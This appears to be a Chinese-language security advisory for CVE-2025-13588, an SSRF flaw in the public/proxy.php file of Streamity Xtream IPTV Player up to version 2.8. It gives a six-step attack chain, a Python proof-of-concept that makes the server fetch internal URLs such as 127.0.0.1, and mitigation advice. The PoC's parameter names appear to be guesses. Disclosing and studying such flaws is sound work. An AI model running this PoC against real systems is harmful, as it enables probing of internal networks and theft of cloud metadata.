CVE-2025-13588 Streamity Xtream IPTV Player SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13588

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Streamity Xtream IPTV Player

漏洞概述

CVE-2025-13588是存在于lKinderBueno Streamity Xtream IPTV Player中的一个服务器端请求伪造(SSRF)漏洞。该漏洞影响版本最高至2.8，攻击者可以通过操纵public/proxy.php文件中的未知功能发起远程攻击。由于该漏洞利用代码已被公开，攻击者可以构造恶意请求，利用受影响的服务器作为代理向内部系统或外部恶意资源发起请求。SSRF漏洞允许攻击者绕过防火墙限制，访问内部敏感数据或服务，对企业网络安全造成严重威胁。建议受影响的用户立即升级到版本2.8.1以修复此漏洞。

技术细节

漏洞位于Streamity Xtream IPTV Player的public/proxy.php文件中，该文件存在未正确验证的用户输入。攻击者可以通过构造特定的HTTP请求参数，让服务器向任意URL发起请求。由于服务器端会执行这些请求并返回响应，攻击者可以利用此漏洞探测内网服务、访问云元数据服务(如AWS、阿里云等)、扫描内部端口或读取本地文件。攻击者通常通过在请求中指定目标URL为内部IP地址(如127.0.0.1、10.x.x.x、192.168.x.x)或云服务元数据端点来实现攻击。修复后的版本2.8.1通过添加输入验证和URL白名单机制来防止恶意请求的发送。

攻击链分析

STEP 1

1

攻击者识别目标：发现目标网站运行Streamity Xtream IPTV Player且版本<=2.8

STEP 2

2

定位漏洞点：访问public/proxy.php文件，发现其存在SSRF漏洞

STEP 3

3

构造恶意请求：攻击者构造包含内部IP或恶意URL的请求参数

STEP 4

4

发起SSRF攻击：服务器作为代理向攻击者指定的目标发起请求

STEP 5

5

获取敏感信息：读取内网资源响应，如云元数据、本地文件、内部API等

STEP 6

6

横向移动或进一步利用：利用获取的信息进行更深层次的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13588 SSRF PoC
# Target: Streamity Xtream IPTV Player <= 2.8
# File: public/proxy.php

def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability in proxy.php
    target_url: Base URL of the vulnerable application
    internal_target: Internal resource to target (e.g., http://127.0.0.1:80/)
    """
    # Construct the malicious request
    exploit_url = f"{target_url}/public/proxy.php"
    
    # Parameters to test SSRF
    params = {
        'url': internal_target,  # Attacker-controlled URL parameter
        'action': 'fetch'  # or other vulnerable actions
    }
    
    try:
        print(f"[*] Sending SSRF payload to {exploit_url}")
        print(f"[*] Targeting: {internal_target}")
        
        response = requests.get(exploit_url, params=params, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.content)}")
        
        if response.status_code == 200:
            print("[!] SSRF Exploit Successful - Internal resource accessible")
            return True
        else:
            print("[-] Exploit failed or target not vulnerable")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <internal_target>")
        print(f"Example: python {sys.argv[0]} http://target.com http://127.0.0.1:80/")
        sys.exit(1)
    
    target_url = sys.argv[1]
    internal_target = sys.argv[2]
    exploit_ssrf(target_url, internal_target)

影响范围

Streamity Xtream IPTV Player <= 2.8

防御指南

临时缓解措施

在官方补丁发布前，可以临时禁用或限制public/proxy.php的访问，配置Web应用防火墙(WAF)规则拦截异常的代理请求，并对所有用户输入进行严格的URL验证和过滤。